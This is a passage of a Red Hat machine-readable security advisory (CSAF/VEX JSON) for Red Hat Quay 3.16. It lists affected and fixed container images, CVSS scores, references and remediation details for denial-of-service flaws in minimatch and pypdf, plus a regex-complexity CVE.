"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
